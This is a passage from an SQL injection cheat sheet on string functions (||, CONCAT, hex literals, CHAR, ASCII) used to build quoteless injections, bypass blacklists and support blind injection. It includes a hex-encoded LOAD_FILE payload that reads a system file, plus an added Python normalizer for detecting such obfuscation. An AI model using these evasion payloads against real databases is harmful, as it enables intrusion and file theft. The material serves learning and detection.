String-related operations can be quite useful for building injections that use no quotes, for bypassing other blacklisting, or for determining the back-end database.
||
SELECT login || '-' || password FROM members
NOTE: About MySQL “||”
If MySQL is running in ANSI mode, this works; otherwise MySQL treats || as a `logical operator` and the expression returns 0.
A better way to do it in MySQL is the CONCAT() function:
CONCAT(str1, str2, str3, ...) (M) /* Concatenate supplied strings. */
SELECT CONCAT(login, password) FROM members
These are some direct ways of using strings, but it is always possible to use CHAR() to generate a string without quotes.
0x457578 /* Hex representation of string. */
SELECT 0x457578 /* This will be selected as a string in MySQL. */
In MySQL, an easy way to generate the hex representation of a string is:
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
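For detection, the quoteless forms described above (hex literals, CHAR() and CONCAT()) can be folded back into plain quoted strings before any rule is matched against a logged query. The following is an added example, not part of the original cheat sheet; the function names and the quote-only filter are hypothetical, and the sample queries in the test are the ones shown on this page.

```python
import re

# Added example: hypothetical helpers, not taken from any library or product.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")
CHAR_CALL = re.compile(r"\bCHAR\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
LITERAL = r"'(?:[^'\\]|\\.)*'"
CONCAT_CALL = re.compile(
    r"\bCONCAT\s*\(\s*(%s(?:\s*,\s*%s)*)\s*\)" % (LITERAL, LITERAL), re.I)


def _quote(text):
    """Render decoded text as a MySQL-style quoted literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def _hex(m):
    digits = m.group(1)
    if len(digits) % 2:  # MySQL pads odd-length 0x values with a leading 0
        digits = "0" + digits
    return _quote(bytes.fromhex(digits).decode("latin-1"))


def _char(m):
    codes = [int(c) for c in m.group(1).split(",")]
    if any(c > 255 for c in codes):  # multi-byte arguments: leave untouched
        return m.group(0)
    return _quote("".join(map(chr, codes)))


def _concat(m):
    # Join the (still escaped) bodies of the quoted arguments into one literal.
    parts = re.findall(r"'((?:[^'\\]|\\.)*)'", m.group(1))
    return "'" + "".join(parts) + "'"


def normalize(query):
    """Rewrite 0x.., CHAR(..) and CONCAT of literals into quoted strings."""
    query = HEX_LITERAL.sub(_hex, query)
    query = CHAR_CALL.sub(_char, query)
    prev = None
    while prev != query:  # repeat so nested CONCAT calls fold completely
        prev, query = query, CONCAT_CALL.sub(_concat, query)
    return query


def quote_blacklist_flags(query):
    """Constructed stand-in for a filter that only looks for quote characters."""
    return "'" in query or '"' in query
```

Type syntax such as CAST(x AS CHAR(10)) is rewritten as well, so the normalized text is for detection rules only and should never be sent back to the database.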
ASCII()
Returns the ASCII character value of the leftmost character. A must-have function for blind SQL injections.
SELECT ASCII('a')
CHAR()
Converts an integer to its ASCII character.
SELECT CHAR(64)